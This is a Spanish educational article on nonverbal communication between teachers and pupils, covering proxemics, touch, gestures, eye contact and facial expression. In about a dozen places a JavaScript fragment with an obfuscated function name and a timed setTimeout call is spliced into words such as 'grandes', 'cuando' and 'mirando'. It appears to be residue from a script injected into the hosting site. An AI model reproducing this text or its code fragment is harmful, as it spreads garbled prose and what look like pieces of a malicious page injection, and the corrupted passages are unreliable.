HABLAMOS SIN VOZ: COMUNICACIÓN NO VERBAL

Autor: David González Delgado


En los últimos años los estudios sobre enseñanza y psicología pedagógica han tenido en cuenta los fenómenos comunicacionales que se desarrollan dentro del contexto de las interacciones entre profesor y los alumnos. Se reconoce que el tipo de comunicación que se establezca en el aula tiene una notable influencia en el éxito y la eficacia de la enseñanza.

Los estudios realizados sobre el proceso comunicacional parten de un análisis interactivo, reconociéndose que el comportamiento de los maestros es un factor decisivo para dicho proceso. Por esta razón, términos como “autoritarismo”, “democrático”, “integrador”, etc… han marcado directrices para el hecho educativo. Se determinan cinco grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes áreas de comunicación no verbal:

1.- Área facial

2.- Área oculésica

3.- Área kinésica

4.- Área proxémica

5.- Área táctil

Comunicación

Antes de abordar los diferentes planteamientos sobre la comunicación no verbal, parece coherente  esbozar  los  rasgos  distintivos  de  la  comunicación  en  general.  La  mayoría  de  los estudiosos del tema de la comunicación están de acuerdo en hacer coincidir en el mensaje dos aspectos, el verbal (palabras emitidas) y el vocal (volumen, velocidad, entonación, etc…). Teniendo presente esto, habría que admitir que dejar de descodificar los estímulos vocales supondría la no captación  del  significado  global  del  mensaje.  Junto  a  estos  estímulos  verbales  y  vocales del mensaje, debemos introducir   los estímulos físicos como elemento importante por el papel que juegan en la comunicación entre un emisor codificador y un receptor descodificador.

En el siguiente esquema reproducido de Miller, se observa que los tres tipos de estímulos están colocados al mismo nivel y que influyen por igual en el mensaje.

                                                                                 ESTÍMULOS VERBALES

ESTÍMULOS FÍSICOS

Emisor codificador                  Gestos  Movimientos Expresión faciales etc.                            Receptor descodificador

ESTÍMULOS VOCALES

Velocidad Volumen Inflexiones etc.

 

Comunicación no verbal en el aula.

Una de las parcelas de la investigación que trata de describir lo que realmente sucede en las aulas entre alumnos y maestros cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando están comprometidos en la tarea de enviar y recibir conocimientos, actitudes y habilidades, toman como fundamento básico la concepción de la enseñanza como un proceso de comunicación. El proceso enseñanza/aprendizaje es en esencia un acto  de  comunicación  desde  esta  perspectiva.  Dicho  proceso  es  reconocido  como  una  tarea compleja. No sólo es importante que el alumno adquiera los objetivos de conocimientos propuestos por la enseñanza, sino también la creación de actitudes y sentimientos. La mayoría de los profesores aceptan que las habilidades cognitivas, afectivas y psicomotoras estén interrelacionadas y afecten por igual en una actividad de aprendizaje. Sin embargo, este camino queda mucho por recorrer. En la práctica diaria, normalmente, nos encontramos que los maestros concentran su atención en un solo aspecto y miden éxitos o resultados que se refieren solamente a este aspecto.

El problema se plantea al intentar llegar a comprender el proceso de la comunicación y sobre todo de la comunicación no-verbal, dentro de la tarea de enseñanza-aprendizaje. Los maestros tienen que ser consciente de la comunicación no verbal en el aula por dos razones:

1.- Para recibir mejor los mensajes de los alumnos.

2.- Para adquirir habilidades en enviar a los alumnos señales positivas que refuercen el aprendizaje y al mismo tiempo evitar las señales negativas que entorpezcan el mismo

Áreas de expresión no verbal.

La caracterización de la proximidad no verbal como un comportamiento de acercamiento, disponibilidad a la comunicación, de intimidad y afecto interpersonal, nos permite describir las cincos grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes áreas de comportamiento no verbal que hemos hablado en la introducción y que nos proporcionan las bases para el comportamiento no verbal.

+ Utilización del espacio (Proxémica)

+ Contacto físico (Háptica)

+ Gestos y movimientos corporales (kinésica)

+ Aspectos visuales (Oculésica)

+ Expresiones faciales (Facial)

 

Utilización del espacio.

El estudio del espacio y distancia interpersonal recibe el nombre de Proxémica en el campo de la comunicación no verbal. Existen estímulos proxémicos que pueden indicar intimidad durante la comunicación:

* la distancia física

* mirar frente a frente

* el plano físico

 

Estas variables pueden comunicar fuertes mensajes entre los interactuantes e incluso grados distinto de cordialidad y proximidad. La distancia física entre el maestro y los alumnos es un factor crítico en el proceso de la comunicación en el aula. Desde esta perspectiva, se asume que entre los maestros existe un comportamiento muy generalizado que consiste en situarse en la parte delantera del aula o sentarse detrás de la mesa. La distancia provoca actitudes positivas o negativas resaltandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando que a distancias más cortas generan actitudes más positivas, calificándose como personas más afectuosas, cercanas, más simpáticas y comprensiva.

Podemos llegar a la conclusión que los maestros debemos realizar el esfuerzo por penetrar dentro de la burbuja espacial de todos los alumnos.

A diario nos encontramos situaciones en la que no miramos frente a frente a los alumnos, bien por escribir en la pizarra dándoles la espalda, sentarnos detrás de la mesa… son situaciones que a menudo se dan pero no debemos abusar de ellas. De la misma manera, es muy difícil que los alumnos mantengan una discusión animada cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando éstos están sentados en filas continuas mirandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando hacia el maestro, por eso debemos adaptar el espacio físico de la clase a la actividad a realizar, así si creamos un debate deberíamos organizar un corro para que todos estemos frente a frente.

Contacto físico.

El contacto físico entre sujetos recibe el nombre de comunicación háptica. El contacto entre profesores y alumnos, así como entre ellos, es expresión de ternura, de apoyo afectivo y de buena disposición hacia el alumno. Mediante el tacto el maestro comunica amor y  cariño, negar el contacto es manifestación de rechazo y provoca sentimiento de aislamiento. A lo largo de la educación primaria desempeñamos un papel de padres sustitutos y muchos tipos de contacto son esperados y permitidos, por el contrario en los niveles más altos de contacto físico a menudo puede interpretarse como comportamiento sexual. Así pues se puede utilizar un apretón de mano, los toque en el hombro, en la cabeza, etc… son estímulos motivadores más poderoso que los comunicados a través de la palabra. Pueden ser utilizados como doble sentido: por un lado se puede presentar como llamada de atención por mal comportamiento y por otro, como refuerzo.

Teniendo en cuenta las normas del colegio y del grupo social y cultural de donde provengan los niños, los maestros deben darse cuenta a qué alumno no les gustas el contacto físico. Aunque todos los profesores deben saber que el contacto físico en los primeros niveles, no sólo deben procurarlo, sino que debe ser indispensable. Sin duda, el juicio del maestro es el mejor indicador.

 

Gestos y movimientos corporales.

La  comunicación por  medio de  movimientos y  gestos  corporales recibe el  nombre  de kinesis. Los cambios de postura dentro del contexto enseñanza/aprendizaje son indicativos del agrado o desagrado al interactuar con los alumnos, pero al mismo tiempo son ilustrativos de la propia autoconfianza, energía, cansancio y status del maestro. No solo nos referimos a los gestos y movimientos del profesor, sino también al de los alumnos: “un estudiante que se reclina hacia atrás envía un  mensaje que es  muy diferente del  que está  inclinado hacia adelante o  está sentado derecho”. Estos aspecto se concreta en el grado de tensión y relajación de sus posturas. Referente a la relajación, los seis postulados son:

1. – Apertura de brazos.

2.- La inclinación del cuerpo sobre el costado.

3.- La asimetría de la posición en las piernas.

4.- La distensión de las manos.

5.- La relajación del cuello.

6.- El grado de inclinación del cuerpo.

 

La interpretación final del significado de los gestos y movimientos corporales, resulta difícil porque ha de ser considerada según el contexto. Es decir, mientras que una configuración de claves no verbales pueden parecer que conllevan un cierto sentimiento, debemos ser consciente de que la misma configuración puede tomar un significado completamente diferente si tiene lugar en un contexto en el cual tales comportamientos se neutralicen, se exageren o se supriman por otros factores.

Aspectos visuales.

Llamamos Oculesis al estudio de mensajes enviados con los ojos. El contacto visual invita a la comunicación y es un fuerte estímulo de proximidad. Las funciones que puede ejercer la mirada y el contacto visual se resumen en cinco:

1.- Proporciona información.

2.- Regula la interacción.

3.- Expresa intimidad.

4.- Ejerce control social.

5.- Facilita metas.

La mirada del maestro puede suponer un reforzamiento positivo y el alumno interpreta esa señal como una disposición de escucha y atención a lo que él comunica en ese momento. Por el contrario, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la mirada disminuye, el alumno interpreta con la aparición de actitudes negativas. El profesor es visto a través de su actitud visual como un formador dispuesto a comprometerse con el alumno en su tarea educativa. Asimismo la ausencia de atención visual es considerada como una falta de implicación con el otro. También debemos reseñar que ejerce otra función y es regular el inicio y el final de una conversación, así como la solicitud de turno de palabra. Los ojos controlan los roles de una conversación, es decir, quién tiene que escuchar y quién hablar. Visto de esta forma los maestros informa a los alumnos quién debe responder a través de señales visuales que a menudo acompañan con gesto manuales y faciales.

Al aplicar la interacción visual, por un lado se reducen las distancias físicas en aulas grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes y numerosas y por otra es un medio auxiliar en el manejo de la clase, en la motivación individual y en la prevención de problemas de disciplina. Debido a las variadas funciones comunicativas de la mirada, el contacto visual del profesor en cada momento puede estar formado por diversos componentes que a su vez contienen información sobre las condiciones necesarias para que la comunicación en el aula siga fluida. Por ejemplo, una mirada fija e inquisitiva puede requerir de los alumnos   silencio,   señalandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando   desaprobación   al   mismo   tiempo   y   manifestandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando   la   posible consecuencia de esa acción en caso de persistir.

El conocimiento por parte del profesor de los mensajes que los alumnos transmiten con la mirada suscita una valoración de su comportamiento docente. Un somero análisis de la mirada de los alumnos detectaría la eficacia o ineficacia del planteamiento de los conocimientos que se imparten en ese momento. Efectivamente un análisis de la mirada de los alumnos ayudaría al maestro a valorar objetivamente su propia metodología.

Este conocimiento reduciría la angustia del profesor y la ansiedad de los alumnos cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en el proceso de enseñanza/aprendizaje, los alumnos y el profesor no sintonizan en el punto acerca del interés y la motivación por el tema.

Expresiones faciales.

La cara y la habilidad de interpretar señales faciales son factores importantes a la hora de formarnos una impresión acerca de una persona, por ello dividimos el rostro en tres zonas:

1.- Cejas y frente.

2.- Ojos y párpados.

3.- Boca, mentón, mejillas y nariz.

 

Podemos  localizar  nueve  estímulos  emocionales  en  dichas  partes  de  la  cara:  alegría,  cólera, sorpresa,  tristeza,  asco  miedo,  interés,  desprecio  y  vergüenza.  Estas  emociones  las  podemos localizar en las siguientes zonas:

+ La alegría que aparece esencialmente en la parte inferior del rostro y en los ojos.

+ La tristeza, en los ojos.

+ La sorpresa, en los ojos y en la pare inferior del rostro.

+ La cólera, en la parte inferior del rostro y en la zona frente-cejas.

+ El asco, que afecta a la parte inferior del rostro.

+ El miedo se manifiesta sobre todo en los ojos.

Se puede decir también que la sonrisa, dentro del plano de la comunicación, se considera como una de las manifestaciones faciales cuyo papel psicológico y función social es importante. En la enseñanza la sonrisa es otro tipo de comportamiento no verbal que comunica proximidad interpersonal. Se la definiría como el simbolismo de la satisfacción y alegría. Un sujeto parece más dispuesto a la relación y más cercano al otro interactuante a medida que aumenta la frecuencia de sus sonrisas.

Utilizar esto en el aula es un arma fácil y poderosa ya que predispone a una comunicación más afectiva y positiva entre el maestro y los alumnos.

 

Conclusión

Como ya hemos visto en el proceso de enseñanza/aprendizaje no solo el contenido verbal juega un papel fundamental, sino que todo lo que hagamos, gesticulemos, miremos… ,es decir, el contenido no verbal adquiere una gran importancia. Con ello no solo logramos transmitirle a los alumnos ciertos conocimientos, sino que ellos nos transmiten a nosotros sus emociones y su grado de entendimiento, ayudándonos así a mejorar nuestra docencia. El proceso interpretativo del significado de los comportamiento no verbales está contextualizado y además la mayoría de las manifestaciones gestuales se han adquirido a través de la experiencia y han sido mejoradas a base de llevarla a cabos en el aula. La sonrisa es lo que más se debería utilizar por provocar actitudes más positivas  debido a sus efectos relajantes y satisfactorio. En función de factores como la atención, disciplina y aprendizaje la proximidad física es necesaria tanto en educación infantil como en educación primaria.

 

Parasabermás.

 

- MILLER, G. (1966): Speech communication: A behavioral Approach. Bobbs-Merril. Indianapolis.

 

- SCHEFLEN, A. (1987): “Sistemas de la comunicación humana”. En Bateson, G y otros: La nueva comunicación. Kairos, Barcelona.

- NASCIMENTO DOMINIQUE, N. (2005): “Comunicación no verbal: algunas diferencias gestuales entre España  y Brasil”, Linred.

- http://aulacomunicacionnoverbal.blogspot.com.es/

 

- http://educacion.laguia2000.com/estrategias-didacticas/comunicacion-no-verbal-en-el-aula.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.